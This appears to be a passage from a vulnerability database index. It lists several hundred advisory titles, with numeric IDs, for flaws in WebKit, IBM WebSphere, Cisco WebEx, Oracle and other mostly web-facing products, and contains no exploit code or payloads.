[93910] WebKit RenderBlock::markAllDescendantsWithFloatsForLayout Function Use-after-free Arbitrary Code Execution [93909] WebKit Form Control Element Handling Use-after-free Issue [93908] WebKit dispatchEditableContentChangedEvents Function Use-after-free Arbitrary Code Execution [93893] WebKit StyleElement::clearSheet Function Use-after-free Arbitrary Code Execution [93888] Google Chrome DevToolsWindow Inspected WebContents Handling Use-after-free Issue [93886] WebKit TextIterator::rangeFromLocationAndLength Function Use-after-free Arbitrary Code Execution [93844] Google Chrome WebMediaPlayerClientImpl.cpp HTML5 Audio Handling Use-after-free Arbitrary Code Execution [93749] Webform Module for Drupal Labels Created Components XSS [93748] IBM WebSphere Portal Web Content Viewer Portlet XSS [93745] Splunk Web Unspecified XSS [93727] IBM WebSphere Portal Unspecified HTTP Response Splitting [93722] ZNC modules/webadmin.cpp NULL Pointer Dereference Remote DoS [93684] WebKit ApplyStyleCommand::splitAncestorsWithUnicodeBidi() Function Synchronous Event Handling Use-after-free Arbitrary Code Execution [93682] Cisco WebEx for iOS SSL Certificate Validation MitM Spoofing Weakness [93649] WebKit RenderBlock::addChildIgnoringAnonymousColumnBlocks Function Spanning Element In Columns Handling DoS Weakness [93642] WebKit DOMSelection::containsNode Function Use-after-free Arbitrary Code Execution [93640] WebKit Fullscreened Element Inline Splitting Bad Cast Memory Corruption [93637] WebKit RenderBlock::splitFlow / RenderInline::splitFlow Floating Objects Handling Use-after-free Issue [93580] WebKit SVG SVGElement Destructor Data Cleanup Use-after-free Arbitrary Code Execution [93578] WebKit Drag and Drop / Copy and Paste srcdoc Attribute XSS [93574] Google Chrome Web Audio Unspecified Memory Corruption (188092) [93573] WebKit StyleResolver::styleForElement Function Style Resolution Use-after-free Arbitrary Code Execution [93562] IBM WebSphere DataPower SOA Appliances SOAP Message Body XSS [93548] SAP Network Interface Router (SAProuter) Crafted NI Route Message Handling Heap Buffer Overflow [93538] SAP NetWeaver Gateway SAP Management Console SOAP Interface Unauthenticated Configuration Download [93512] web2py /applications/welcome/static/js/share.js Unspecified XSS [93504] Wireshark Websocket Dissector Malformed Packet Handling Remote Stack Buffer Overflow DoS [93489] WebKit Unspecified Memory Corruption (2013-1011) [93488] WebKit Unspecified Memory Corruption (2013-1010) [93487] WebKit Unspecified Memory Corruption (2013-1008) [93486] WebKit Unspecified Memory Corruption (2013-1007) [93485] WebKit Unspecified Memory Corruption (2013-1006) [93484] WebKit Unspecified Memory Corruption (2013-1005) [93483] WebKit Unspecified Memory Corruption (2013-1004) [93482] WebKit Unspecified Memory Corruption (2013-1003) [93481] WebKit Unspecified Memory Corruption (2013-1002) [93480] WebKit Unspecified Memory Corruption (2013-1001) [93479] WebKit Unspecified Memory Corruption (2013-1000) [93478] WebKit Unspecified Memory Corruption (2013-0999) [93477] WebKit Unspecified Memory Corruption (2013-0998) [93476] WebKit Unspecified Memory Corruption (2013-0997) [93475] WebKit Unspecified Memory Corruption (2013-0996) [93474] WebKit Unspecified Memory Corruption (2013-0995) [93473] WebKit Unspecified Memory Corruption (2013-0994) [93472] WebKit Unspecified Memory Corruption (2013-0993) [93471] WebKit Unspecified Memory Corruption (2013-0992) [93470] WebKit Unspecified Memory Corruption (2013-0991) [93467] Stanford WebAuth CGI::Application login.fcgi Cross-session Cookie Disclosure [93456] MiniWeb HTTP Server Crafted POST Request Handling Remote Overflow DoS [93393] Cisco WebEx Social Post URL XSS [93392] Cisco WebEx Social Multiple Field Value Manipulation [93306] Microsoft Office Publisher PUB File Corrupt Interface Pointer Handling Arbitrary Code Execution [93277] ZyXEL ZyWALL Web Configurator Default Password [93250] WebKit Frame Handling Multiple Use-after-free Issues [93249] WebKit WebCore::AudioNodeOutput::pull Function Web Audio Handling Use-after-free Arbitrary Code Execution [93248] WebKit HTMLMediaElement::removedFrom Function Track Deleted During Video Element Deletion DoS [93185] Cisco Unified Presence (CUP) Web Framework Malformed TCP Packet Handling Memory Exhaustion Remote DoS [93112] Juniper Junos Space / JA1500 Web UI Configuration Tabs Plaintext Password Disclosure [93110] Cisco Unified Customer Voice Portal (CVP) Tomcat Web Management Component User-supplied Application Execution [93105] Cisco Unified Customer Voice Portal (CVP) Tomcat Web Management Component Unspecified Remote Privilege Escalation [93103] NetApp OnCommand System Manager SnapMirror Interface Arbitrary File Access [93102] NetApp OnCommand System Manager Halt/Reboot Interface Arbitrary Command Execution [93101] NetApp OnCommand System Manager /zapiServlet User Management Interface Multiple Parameter XSS [93100] NetApp OnCommand System Manager Group Management Interface comment Parameter XSS [93099] NetApp OnCommand System Manager Share Management Interface comment Parameter XSS [93098] NetApp OnCommand System Manager /zapiServlet CIFS Configuration Management Interface Multiple Parameter XSS [93097] NetApp OnCommand System Manager LUN Management Interface comment Parameter XSS [93084] GroundWork Monitor Enterprise Foundation /foundation-webapp/admin/manage-configuration.jsp nagios Account /usr/local/groundwork/ Arbitrary File Manipulation [93075] Forbes Magazine Microsoft Office 365 T-Mobile Router Admin Interface Default Password [93056] IBM WebSphere DataPower XC10 Unspecified Unauthenticated Admin Command Execution [93055] WeBid yourauctions_p.php startnow Parameter SQL Injection [93051] EasyWebScripts Craigslist Clone Gold index.php catid Parameter SQL Injection [93048] IBM Sterling Secure Proxy HTTP Header Web Server Version Disclosure [93046] Beat Websites beats.php gid Parameter SQL Injection [93042] VideoJS video-js.swf ExternalInterface.call() Method readyFunction Parameter XSS [93008] Apache VCL Web GUI Unspecified Remote Privilege Escalation [93003] Cisco WebEx Crafted Request Uninitialized Memory Remote Disclosure [92940] Cisco WebEx Crafted HTTP Request Handling Cache Directory File Disclosure [92931] Microsoft System Center Operations Manager Web Console /InternalPages/ViewTypeManager.aspx Multiple Parameter XSS [92895] HP Service Manager Web Tier Component Unspecified XSS [92894] HP Service Manager Web Tier Component Unspecified Remote Information Disclosure [92893] Cisco Prime Central for Hosted Collaboration Solution (HCS) OpenView Web Menus Unspecified XSS [92892] Cisco Prime Central for Hosted Collaboration Solution (HCS) Netcool Impact (NCI) Web Menus Unspecified XSS [92885] IBM Sametime Classic Meeting Server Web Application Component Unspecified XSS [92818] WebKit Object Element beforeload Event Frame Removal Use-after-free Arbitrary Code Execution [92813] VMware vCenter Server Appliance (vCSA) Virtual Appliance Management Interface (VAMI) Unspecified Arbitrary File Upload [92811] VMware vCenter Server Appliance (vCSA) Virtual Appliance Management Interface (VAMI) Unspecified Arbitrary File Execution [92803] CommuniGate Pro Webmail Email Reply Content Parsing XSS [92788] jigbrowser+ Application for Android Crafted Website Handling Address Bar Spoofing Weakness [92781] IBM WebSphere MQ amqxcs2.dll xcsGetMem Function Packet Parsing Integer Overflow [92780] IBM WebSphere MQ TCPReceive Function Signedness Error Heap Overflow Remote DoS [92769] Cisco NX-OS Software Management Interface Crafted Jumbo Frame Packet Handling Remote DoS [92761] Cisco Unified Computing System Manager Web Console Login Page Malformed Request LDAP User Authentication Bypass [92716] Lexmark Markvision Enterprise Diagnostic Interface Unauthenticated Remote Command Execution [92715] IBM WebSphere Application Server (WAS) Web 2.0 / Mobile Toolkit RPC Adapter Unspecified XSS [92714] IBM WebSphere Application Server (WAS) Admin Console Unspecified Traversal [92713] IBM WebSphere Application Server (WAS) Local OS Registry Validation Remote Restriction Bypass [92712] IBM WebSphere Application Server (WAS) Admin Console Unspecified XSS [92711] IBM WebSphere Application Server (WAS) localOS Registry / WIM Handling Local Overflow DoS [92710] IBM WebSphere Application Server (WAS) Liberty Profile Cookie Validation Failure Remote Authentication Bypass [92709] Apache ActiveMQ Web Console Unauthenticated Remote Access [92708] Apache ActiveMQ Sample Web Application Broker Resource Consumption Remote DoS [92707] Apache ActiveMQ webapp/websocket/chat.js Subscribe Message XSS [92694] ERDAS ER Viewer ermapper_u.dll ERM_convert_to_correct_webpath() Function ERS File Handling Stack Buffer Overflow [92675] WebKit 'CompositeEditCommand::cloneParagraphUnderNewElement' Function Use-after-free Arbitrary Code Execution [92640] All in One Webmaster Plugin for WordPress Script Insertion CSRF [92586] pd-admin WebFTP Overview Create new directory Field XSS [92560] SoSci Survey Unprivileged Admin Interface Navigation Element Exposure [92544] icedtea-web JAR File Format Verification Arbitrary Code Execution [92543] icedtea-web Cross-domain Applet Class Loader Applet Manipulation [92502] WebKit 'ApplyStyleCommand::splitAncestorsWithUnicodeBidi' Function Use-after-free Issue [92501] WebKit Selected Option Inserted Into Select Element Handling Memory Corruption [92500] WebKit 'RenderObject::willBeDestroyed' Function Use-after-free Issue [92499] WebKit errorEventSender Pending Load Events Interaction Use-after-free Issue [92461] Oracle GlassFish Server REST Interface Subcomponent Unspecified Remote Issue [92460] Oracle GlassFish Server ADMIN Interface Subcomponent Unspecified Remote Issue [92443] Oracle Primavera P6 Enterprise Project Portfolio Management Web Access Subcomponent Unspecified Remote Issue (2013-2411) [92442] Oracle Primavera P6 Enterprise Project Portfolio Management Web Access Subcomponent Unspecified Remote Issue (2013-2405) [92420] Oracle Web Services Manager Web Services Security Subcomponent Unspecified Remote Issue [92416] Oracle Siebel CRM Siebel Enterprise Application Integration Component Web Services Subcomponent Unspecified Remote Information Disclosure [92414] Oracle Siebel CRM Siebel Enterprise Application Integration Component Web Services Subcomponent Unspecified Remote Information Disclosure [92412] Oracle Siebel CRM Siebel Enterprise Application Integration Component Web Services Subcomponent Unspecified Remote Issue [92389] Oracle WebCenter Content Server Subcomponent Unspecified Remote Issue (2013-1522) [92388] Oracle WebCenter Interaction Image Service Subcomponent Unspecified Remote Issue [92387] Oracle WebCenter Capture Import Server Subcomponent BlackIceDevMode.ocx ActiveX SetAnnotationFont() Method Arbitrary Code Execution [92386] Oracle WebCenter Content Server CheckOutAndOpen.dll ActiveX Multiple Method Code Execution [92385] Oracle WebCenter Sites /cs/Satellite Multiple Parameter HTTP Header Injection [92384] Oracle WebCenter Content Server Subcomponent Unspecified Remote Issue (2013-1503) [92383] Oracle WebCenter Content Server Subcomponent Unspecified Remote Information Disclosure [92379] Oracle WebLogic Server WebLogic Console Subcomponent Unspecified Remote Issue (2013-2390) [92378] Oracle WebLogic Server console/console.portal SNMPMonitoringTablePortlet[SNMPMonitoringTable]sortby Parameter XSS [92375] Oracle HTTP Server Web Listener Subcomponent Unspecified Remote DoS [92374] Oracle COREid Access WebGate - WebServer Plugin Subcomponent Unspecified Remote Issue [92371] Oracle Java JDK / JRE JavaFX WebPage Class getPage Method Overwrite Remote Arbitrary Code Execution [92299] Dillo Web Browser CSS :visited Pseudo-class Handling Browsing History Disclosure [92273] Free Monthly Websites /admin/file_io.php Admin Password Manipulation [92259] RESTful Web Services for Drupal Cache Poisoning Remote DoS [92254] jPlayer Jplayer.swf ExternalInterface.call() Method jQuery Parameter XSS [92227] Juniper Junos J-Web Sajax Unspecified Remote Code Execution [92206] Cisco IOS XE on 1000 Series Aggregation Services Routers (ASR) Bridge Domain Interface Malformed Packet Handling Remote DoS [92200] MiniWeb HTTP Server Non-existent Directory Arbitrary File Upload [92198] MiniWeb HTTP Server filename Parameter Traversal Arbitrary File Upload [92188] IBM TRIRIGA Application Platform /WebProcess.srv attr_seq_1001 Parameter XSS [92170] IBM TRIRIGA Application Platform /WebProcess.srv translationsDocumentManager Scan Name XSS [92149] Dart Communications DartWebserver.Dll Malformed Request Null Pointer Derefence Remote DoS [92083] WebKit RenderBlock::splitTablePartsAroundChild Nested Table Splitting Bad Cast Memory Corruption [92082] WebKit Table Splitting Child Handling Bad Cast Memory Corruption [92080] TinyWebGallery image.php Multiple Parameter Malformed Input Path Disclosure [92061] WebKit Non-HTML Element Inline Style Removal Bad Cast Memory Corruption [92052] CUPS cupsd.conf Listen Directive Admin Interface Restriction IPv6 Connection Bypass [91984] C2 WebResource fileview.asp File Parameter XSS [91978] TinyWeb Malformed HTTP Request Remote DoS [91957] Sophos Web Appliance /rss.php xss Parameter XSS [91956] Sophos Web Appliance /end-user/errdoc.php msg Parameter XSS [91955] Sophos Web Appliance /end-user/ftp_redirect.php h Parameter XSS [91954] Sophos Web Appliance /index.php threat Parameter XSS [91953] Sophos Web Appliance /cgi-bin/patience.cgi id Parameter Traversal Arbitrary File Access [91952] Sophos Web Appliance Multiple Functionality Remote Command Execution [91951] Feedweb Plugin for WordPress /wp-content/plugins/feedweb/widget_remove.php wp_post_id Parameter XSS [91901] Juniper IVE OS Web Server Unspecified Cross-session Information Disclosure [91900] WebKit WebCore/html/HTMLMediaElement.cpp HTMLMediaElement Destructor Use-after-free Arbitrary Code Execution [91899] WebKit WebCore/dom/Node.cpp Node::enclosingBlockFlowElement Function Bad Cast Arbitrary Code Execution [91897] Juniper Mobility System Software (MSS) WebAAA Login (wba_login.html) XSS [91879] Mozilla Multiple Products WebGL Rendering Mesa Graphics Driver on Linux Invalid Free Arbtirary Code Execution [91864] IBM InfoSphere Information Server Web Console Unspecified XSS [91863] IBM WebSphere Commerce Configuration File Plain Text Password Disclosure [91861] RuggedCom Rugged Operating System on LinuX (ROX II) Web API Command Execution [91852] Juniper Junos J-Web SSL Low-bit Cipher Weakness [91842] STUNSHELL Web Shell Unauthenticated Remote Command Execution [91841] v0pCr3w Web Shell Unauthenticated Remote Command Execution [91840] Roundcube Webmail file_get_contents() Call save-prefs Request Handling Arbitrary File Access [91801] WebKit RenderObject::offsetParent Flow Thread Content Node offsetParent Access DoS [91800] WebKit ShadowRoot Listening Touch Event Handling Use-after-free Arbitrary Code Execution [91799] WebKit ARIA Spin Button Creation Type Confusion DoS Issue [91797] Juniper NetScreen IDP Web Management Perl Interpreter Unspecified Remote Command Execution [91773] Juniper JunosE netBufLib.c Malformed Multicast Packet Handling SRP Interface Remote DoS [91772] Juniper DX3250 / DX3650 HP WebInspect Tool Invalid ClientKeyExchange Request Handling Remote DoS [91739] Atmail WebMail /index.php/mail/viewmessage/getattachment/folder/INBOX/uniqueId/ File Name Parameter XSS [91709] Google Chrome Isolated Web Sites Process Handling Unspecified Issue [91701] WebKit AudioNodeInput::numberOfChannels Web Audio Handling Use-after-free Arbitrary Code Execution [91692] Moodle Site-wide WebDav Repository Instances Options Access Restriction Weakness [91689] Moodle WebDav Repository Plaintext Password Disclosure [91682] Splunk Web Component Unspecified XSS (SPL-60629) [91665] IBM Rational Policy Tester / Security AppScan Enterprise Manual Explore Browser Plugin Webpage Handling Platform Credential Disclosure [91589] IBM Domino webadmin.nsf command Field XSS [91588] IBM Domino webadmin.nsf Command Execution CSRF [91578] IBM Rational ClearQuest Web Client Unspecified XSS [91577] IBM Tivoli Endpoint Manager Web Reports Unspecified XSS [91575] Askiaweb /WebProd/cgi-bin/AskiaExt.dll Multiple Parameter XSS [91574] Askiaweb /WebProd/pages/pgHistory.asp nHistoryId Parameter SQL Injection [91573] Askiaweb /WebProd/pages/pgadmin.asp OrderBy Parameter SQL Injection [91566] Linux Kernel dcb Netlink Interface Multiple Stack Memory Disclosures [91564] Linux Kernel Bridging RTM_GETMDB Netlink Interface / RTNLGRP_MDB Notify Message Handling Information Disclosure [91513] Wind River Systems' VxWorks WebCLI Component Crafted Command String Remote DoS [91512] Wind River Systems' VxWorks Web Server Malformed URI Handling Remote DoS [91504] WebKit 'WebCore::AXObjectCache::getOrCreate' Table Section Access Use-after-free [91485] Aruba Mobility Controller ArubaOS Administration WebUI Dashboard SSID XSS [91466] IBM WebSphere Application Server (WAS) library.policy Server-associated Shared Libraries Permission Assignment Weakness [91465] IBM WebSphere Application Server (WAS) trackDependencies Functionality JSP Dependencies Caching Weakness [91464] IBM WebSphere Application Server (WAS) Web Services on Solaris Certificate Validation Weakness [91462] lighttpd on Debian Linux Socket Symlink Web Server Configuration Manipulation [91430] WebKit Unspecified Memory Corruption (2013-0960) [91429] WebKit Unspecified Memory Corruption (2013-0961) [91425] TIBCO Spotfire Web Player Unspecified XSS [91424] TIBCO Spotfire Web Player Unspecified Access Restriction Bypass [91324] IBM WebSphere Application Server (WAS) on zSeries updatedata Method Double-free DoS [91323] IBM WebSphere Application Server (WAS) Default Messaging Component Message Saturation Remote DoS [91317] Siemens WinCC (TIA Portal) Web Server Unspecified Persistent XSS [91316] Siemens WinCC (TIA Portal) Web Server URL Handling Remote Source Code Disclosure [91315] Siemens WinCC (TIA Portal) Web Server Unspecified HTTP Response Splitting [91314] Siemens WinCC (TIA Portal) Web Server Unspecified Link Handling Script Insertion Weakness [91313] Siemens WinCC (TIA Portal) Web Server Unspecified Reflected XSS [91308] Siemens WinCC (TIA Portal) Web Server Insecure Storage Local Credential Disclosure [91307] Siemens WinCC (TIA Portal) Web Server HTTP Request Handling Remote DoS [91306] Siemens SIMATIC WinCC SQL Database WebNavigator Password Obfuscation Weakness [91305] Siemens SIMATIC WinCC SQL Database Obfuscated WebNavigator Password Disclosure [91296] Apple Mac OS X CoreTypes Java Web Start Application Launch Handling Disable Java Plugin Setting Bypass [91273] Web Cookbook /cook/searchrecipe.php Multiple Parameter SQL Injection [91272] Web Cookbook /cook/showtext.php mode Parameter SQL Injection [91268] Kodak Insite Creative Workflow System /TwAmWeb/EmailPassword.asp user_name Parameter SQL Injection [91220] WebKit SVGViewSpec::viewTarget SVG Element Handling Type Confusion Arbitrary Code Execution [91207] WebKit HTMLInputElement Event Processing ImageLoader Deletion Use-after-free Arbitrary Code Execution [91183] Schneider Electric CD Kerwin kerweb.exe Page Refresh Saturation Memory Exhaustion Remote DoS [91173] Apache Wicket WebApplicationPath Constructor Bypass /WEB-INF/ Directory File Access [91117] WebKit HTMLMediaElement Destructor Use-after-free Arbitrary Code Execution [91116] WebKit RenderTable::addChild Table Section Moving Unspecified Issue [91115] WebKit loader/ImageLoader.cpp ImageLoader Element Inside SVGImageElement Deletion Issue [91101] IBM WebSphere Application Server (WAS) WASServiceTrace.log Unspecified Local Information Disclosure [91098] IBM WebSphere Application Server (WAS) esi:include JSP GET Request Remote DoS [91097] IBM WebSphere Application Server (WAS) Cached Credential Authentication Policy Bypass [91096] IBM WebSphere Application Server (WAS) Security Manager Custom Setting Overwrite Weakness [91095] IBM WebSphere Application Server (WAS) Crafted Cache Key Cross-user Authentication Weakness [91094] IBM WebSphere Application Server (WAS) on Solaris ESI Response Processing Remote DoS [91092] IBM WebSphere Application Server (WAS) Security Credential Cache Unspecified Issue [91090] IBM WebSphere Application Server (WAS) componentmap.gskit.xml File Permission Weakness [91089] IBM WebSphere Application Server (WAS) Service Integration Bus Security Update Dynamic Propagation Weakness [91088] IBM WebSphere Application Server (WAS) WebSphere Caching Proxy Error Page XSS [91087] IBM WebSphere Application Server (WAS) icu4j Implementation Java2security Unspecified Issue [91086] IBM WebSphere Application Server (WAS) Public Mbean Unspecified Generated XML File Disclosure [91085] IBM WebSphere Application Server (WAS) plugin-cfg.xml File Permission Unspecified Issue [91084] IBM WebSphere Application Server (WAS) bindingiterator.destory() Function Unauthorized Use [91083] IBM WebSphere Application Server (WAS) PD Tools =audit Trace Specification Logging Failure [91082] IBM WebSphere Application Server (WAS) Plug-in WebSphere App Traffic IHS DoS [91081] IBM WebSphere Application Server (WAS) Portlet Paraller Rendering Unspecified Issue [91080] IBM WebSphere Application Server (WAS) Asynchronous Socket Reconnect Handling Remote Stack Overflow [91078] phpWebSite Default Admin Credentials [91077] WebKit html/shadow/SliderThumbElement.cpp RenderBox Type Confusion Arbitrary Code Execution [91071] Exsite Webware Default Administrator Credentials [91069] IBM WebSphere Application Server (WAS) Service Data Objects Repository Unauthorized Access [91066] IBM WebSphere Application Server (WAS) on Windows was.policy File Permission Handling Weakness [91065] IBM WebSphere Application Server (WAS) User Security Group Privilege Revocation Persistent Access Weakness [91064] IBM WebSphere Application Server (WAS) Security Constraint Deployment Weakness [90894] WebKit Web Audio Channel Handling Race Condition Buffer Overflow [90849] WebKit XSSAuditorDelegate::didBlockScript / XSSAuditor::filterToken Page Block document.referrer Disclosure [90845] WebKit addChildNodesToDeletionQueue SVG Animation Handling Use-after-free [90844] WebKit Web Audio Panner Node Model Processing Race Condition Memory Corruption [90843] Google Chrome WebContentsImpl::CreateOpenerRenderViews Browser Navigation Handling Use-after-free [90842] WebKit FrameLoader::checkCompleted Frame Loader Subframe Deletion Use-after-free [90836] IBM WebSphere Commerce Web Services Framework Unspecified Remote DoS [90803] Juniper Junos J-Web Management Module Unspecified XSS [90780] Websense TRITON Unified Security Center Unspecified SQL Injection [90779] Websense TRITON Unified Security Center Multiple Unspecified XSS [90778] Websense TRITON Unified Security Center Unspecified DoS [90777] Websense TRITON Unified Security Center Crafted Cookie Handling Multiple Page Access Restriction Bypass [90776] Websense TRITON Unified Security Center Multiple Page Authentication Bypass [90759] Juniper Junos J-Web HTTP POST Entity Content Request Handling Remote Overflow [90755] Juniper Junos J-Web Unauthenticated Arbitrary Privileged Account Creation [90734] XEROX WorkCentre Web Console Default Administrator Password [90698] PHP-Fusion /administration/weblink_cats.php Multiple Parameter XSS [90669] WebCalendar category.php Category Name Field XSS [90668] WebCalendar Invalid Login Handling Username Enumeration [90663] WebKit MathML Implementation Unspecified Issue [90628] Rix4Web Portal add-site.php dir_link Parameter SQL Injection [90626] EasyWebScripts eBay Clone Script lostpassword.php msg Parameter XSS [90625] EasyWebScripts eBay Clone Script showcategory.php cid Parameter XSS [90624] EasyWebScripts eBay Clone Script signinform.php msg Parameter XSS [90623] EasyWebScripts eBay Clone Script signinform.php msg Parameter HTTP Response Splitting [90622] EasyWebScripts eBay Clone Script gallery.php cid Parameter SQL Injection [90621] EasyWebScripts eBay Clone Script product_desc.php id Parameter SQL Injection [90620] EasyWebScripts eBay Clone Script showcategory.php cid Parameter SQL Injection [90615] Cisco Cloud Portal nsAPI Interface Crafted URL Handling Remote User Information Disclosure [90614] Adobe Flash Player ExternalInterface ActionScript Feature SWF File Handling Arbitrary Code Execution [90603] skunkWEB sw.log Permission Weakness Local Information Disclosure [90585] webfs on Gentoo Linux webfsd.log Permission Weakness Local Information Disclosure [90557] Apache HTTP Server mod_proxy_balancer balancer-manager Interface Multiple Parameter XSS [90552] Web Cookbook admin/dumpdb.php outfile Parameter Traversal Arbitrary File Access [90551] Web Cookbook rezeptanzeige.php currid Parameter SQL Injection [90527] Google Chrome Web Store API Permission Weakness [90522] WebKit 'AbstractDatabase::AbstractDatabase' Database Handling Use-after-free [90521] WebKit AudioScheduledSourceNode::updateSchedulingInfo Web Audio Node Integer Underflow Memory Corruption [90450] WebKit RenderBlock::updateFirstLetter Style Sheet Handling Use-after-free Remote Code Execution [90449] WebKit Unspecified Style Sheet Handling Use-after-free Remote Code Execution [90448] WebKit RenderObjectChildList::updateBeforeAfterContent Style Sheet Handling Use-after-free [90447] WebKit RenderObject::addChild Table Cell Handling Use-after-free Remote Code Execution [90446] WebKit :before Content Location Style Sheet Handling Use-after-free Remote Code Execution [90426] Mozilla Multiple Product Wrapped WebIDL Object Handling Arbitrary Code Execution [90408] Django Admin Interface Access Permission Verification Object History Disclosure [90390] WebKit V8DOMWindow::namedPropertyGetter Same Origin Policy Bypass [90389] WebKit XSLT-generated Document Security Origin Inheritance Same Origin Policy Bypass [90388] WebKit ScriptController::executeIfJavaScriptURL Synchronous Frame Load Confusion Same Origin Policy Bypass [90387] WebKit DOMWindow Sub-objects Recreation After Navigation Same Origin Policy Bypass [90380] Monroe Electronics Multiple One-Net EAS Products Web Server Default Admin Credentials [90288] IBM InfoSphere DataStage Information Server Web Console /LoggingViewAdmin.do Multiple Parameter XSS [90281] Roundup anydbm Interface Python Backtrace Hashed Password Disclosure [90280] OpenEMR /interface/main/calendar/index.php Multiple Parameter XSS [90279] OpenEMR /interface/main/messages/messages.php Error Message noteid Parameter XSS [90278] OpenEMR /interface/main/messages/messages.php Multiple Parameter XSS [90271] OpenEMR /interface/main/messages/messages.php Multiple Parameter SQL Injection [90259] Epicor Returns Management SOAP Interface Unspecified SQL Injection [90253] IBM CICS Transaction Server for z/OS Web Service Expired Password Authentication Bypass [90188] SonicWALL Scrutinizer fa_web.cgi Multiple Parameter SQL Injection [90185] Siemens CP 1604 / 1616 Interface Card Debugging Interface Crafted Packet Parsing Remote Code Execution [90184] IBM WebSphere Message Broker SOAPInput WSDL File Request Error Message XSS [90183] IBM WebSphere Cast Iron Cloud Integration Unspecified LDAP Authentication Weakness [90182] IBM WebSphere Message Broker WS-Addressing / WS-Security Request Parsing Message Sending Authentication Bypass [90181] IBM WebSphere Message Broker HTTPInput Nodes Query String Parsing Infinite Loop Remote DoS [90177] Roundcube Webmail Email vbscript URI Handling XSS [90175] Roundcube Webmail Email data URI Handling XSS [90088] Atmel AT91SAM7XC Series Microprocessor JTAG Interface Crypto Key Local Disclosure [90050] Google WebP libwebp/dsp.c Image Parsing Out-of-bounds Read Memory Disclosure Weakness [90049] Google WebP libwebp/vp8.c Image Parsing Out-of-bounds Read Memory Disclosure Weakness [90045] Google Chrome Web Data Database Form Data Storage Information Disclosure [90019] VMware Multiple Product vmci.sys Virtual Machine Communication Interface (VMCI) Control Code Handling Local Privilege Escalation [89952] Belkin N600 DB Wireless Router Browser Based Setup Web UI Unspecified Issue [89946] Belkin F9K1002 N300 Wireless Router Web GUI Multiple Password Disclosures [89850] EasyITSP /WEB/customer/voicemail.php Multiple Parameter Traversal Arbitrary File Manipulation [89841] Cisco Unity Express /Web/SA3/AddHoliday.do holiday.description Parameter XSS [89840] Free Monthly Websites /admin/index.php Input Type Field Manipulation Authentication Bypass [89839] Free Monthly Websites /admin/add_main_pages.php File Upload Arbitrary Code Execution [89837] Cisco Unity Express /Web/SA2/ScriptList.do gui_pagenotableData Parameter XSS [89836] Cisco Unity Express /Web/SA/SaveConfiguration.do Multiple Action CSRF [89834] IBM Tivoli Storage Manager (TSM) Client Web GUI Unspecified Remote Access [89825] WebKit DataView Methods Access Negative Index Unspecified Impact [89821] Emerson EC2-552 Condensing Unit Controller Web Server Default Credentials [89820] WebKit FEComponentTransfer::apply feComponentTransfer Element Parsing OOB Function Pointer Array Call Issue [89814] Calypso Control Systems ION-8r Web Server Default Admin Credentials [89813] Sullair eConnect Embedded Web Server Multiple Default Credentials [89808] WebKit WebCore/loader/MainResourceLoader.cpp JavaScript Timestamp 8-byte Value Read Weakness Memory Disclosure [89698] JBoss Enterprise Application Platform / JBoss Enterprise Web Platform Insecure Auto-install XML File Admin Password Local Disclosure [89695] SAP NetWeaver Web Application Server (WebAS) CCMS Service XML External Entity (XXE) Data Parsing Arbitrary File Disclosure [89694] SAP NetWeaver Web Application Server (WAS) AdapterFramework Servlet Information Disclosure [89663] WebKit MIME Type Handling PluginData Page Pointer Page Refreshing Use-after-free [89657] WebKit Cross-Origin Copy Pasted Content Handling XSS [89656] WebKit Website Handling Unspecified Memory Corruption (2013-0950) [89655] WebKit Website Handling Unspecified Memory Corruption (2013-0951) [89654] WebKit Website Handling Unspecified Memory Corruption (2013-0952) [89653] WebKit Website Handling Unspecified Memory Corruption (2013-0953) [89652] WebKit Website Handling Unspecified Memory Corruption (2013-0954) [89651] WebKit Website Handling Unspecified Memory Corruption (2013-0955) [89650] WebKit Website Handling Unspecified Memory Corruption (2013-0956) [89649] WebKit Website Handling Unspecified Memory Corruption (2013-0958) [89648] WebKit Website Handling Unspecified Memory Corruption (2013-0959) [89647] WebKit Website Handling Unspecified Memory Corruption (2013-0968) [89646] WebKit Website Handling Unspecified Memory Corruption (2013-0948) [89645] WebKit Website Handling Unspecified Memory Corruption (2013-0949) [89629] PHP Weby Directory Software contact.php subject Parameter SQL Injection [89627] Samba Web Administration Tool (SWAT) Manipulation CSRF [89626] Samba Web Administration Tool (SWAT) Clickjacking Weakness [89622] Cisco Network Admission Control (NAC) Web Authentication Function Unspecified XSS [89609] PHP Weby Directory Software Admin Account Manipulation CSRF [89599] Cisco WebEx Social Search Functionality Parameter Parsing File Disclosure [89593] Embedthis Appweb on Windows src/mpr/mprLib.c mprUrlEncode Function Heap-based Overflow [89590] Siemens SIMATIC WinCC MiniWeb Server Default Administrator Credentials [89583] JBoss Enterprise Application Platform / JBoss Enterprise Web Platform Multiple Servlet Initial Authentication Bypass [89582] JBoss Enterprise Application Platform / JBoss Enterprise Web Platform CallerIdentityLoginModule Password Retention Remote Session Hijacking [89581] JBoss Enterprise Application Platform / JBoss Enterprise Web Platform SecurityAssociation.getCredential() Function Previous Session Credential Disclosure [89580] JBoss Enterprise Application Platform / JBoss Enterprise Web Platform JMX Invoker Roll Restriction Weakness [89579] JBoss Enterprise Application Platform / JBoss Enterprise Web Platform Remote Plaintext Symmetric Key Disclosure [89578] JBoss Enterprise Application Platform / JBoss Enterprise Web Platform JMX Console Unspecified XSS [89573] WebYaST /host Configuration Path Handling Host List Manipulation [89567] Perforce P4web Web Client Unspecified Script(s) Multiple Parameter XSS [89566] WebKit XSS Filter Split Variable Injection Bypass Weakness [89561] Cisco WebEx Training Center Crafted Request Arbitrary Training-center Recording Manipulation [89558] Cisco WebEx Training Center Crafted Request Arbitrary Hands-on Lab-session Reservation Deletion [89518] IBM WebSphere Application Server (WAS) Information Disclosure CSRF [89517] IBM WebSphere Application Server (WAS) Virtual Member Manager (VMM) Administrative Console Unspecified XSS [89516] IBM WebSphere Application Server (WAS) Servlet Request Parsing Access Restriction Bypass [89515] IBM WebSphere Application Server (WAS) Administrative Console Unspecified XSS (2013-0458) [89514] IBM WebSphere Application Server (WAS) Administrative Console Unspecified XSS (2013-0459) [89502] Google Chrome webrtc_audio_renderer.cc WebRtcAudioRenderer::Initialize Function Unsupported RTC Sampling Rate Memory Corruption [89501] Adult Webmaster /admin/userpwdadfasdfre.txt Direct Request Password Disclosure [89490] General Electric (GE) Intelligent Platforms Proficy HMI/SCADA - CIMPLICITY WebView CimWeb substitute.bcl Crafted Packet Parsing Traversal Arbitrary File Access [89489] General Electric (GE) Intelligent Platforms Proficy HMI/SCADA - CIMPLICITY CimWebServer Crafted Packet Parsing Remote Command Execution [89477] Juniper Junos J-Web Component URL Encoding Heap Buffer 